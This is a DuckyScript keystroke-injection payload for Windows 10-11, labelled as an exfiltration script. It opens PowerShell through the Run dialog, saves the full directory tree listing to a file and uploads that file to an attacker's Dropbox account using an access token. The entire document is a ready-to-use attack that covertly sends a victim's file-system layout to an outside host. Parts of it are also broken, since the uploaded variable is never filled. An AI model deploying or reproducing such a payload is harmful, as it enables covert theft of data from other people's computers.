* ###########################################################
* #                                                         |
* # Title        : Tree Structure Of The Operating System   |
* # Author       : Aleff                                    |
* # Version      : 1.0                                      |
* # Category     : Exfiltration                             |
* # Target       : Windows 10-11                            |
* #                                                         |
* ###########################################################

* Requi*ents:
*     - Internet connection

* Set yout Dropbox access token
DEFINE #DROPBOX_ACCESS_TOKEN example

GUI r
DELAY 1000
STRING PowerShell
ENTER
DELAY 1000

* Setting about exfiltration
STRING tree /f /a > out.txt
ENTER
STRING $filePath=".\out.txt";
ENTER
STRING $accessToken="#DROPBOX_ACCESS_TOKEN"
ENTER
STRING $authHeader = @{Authorization = "Bearer $accessToken"}
ENTER
STRING $dropboxFilePath = "/out_exported.txt"
ENTER

STRING $uploadUrl = "https://content.dropboxapi.com/2/files/upload"
ENTER

STRING $headers = @{}
ENTER
STRING $headers.Add("Authorization", "Bearer $accessToken")
ENTER
STRING $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
ENTER
STRING $headers.Add("Content-Type", "application/octet-stream")
ENTER
STRING Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body 
ENTER
STRING $fileContent; exit;
ENTER
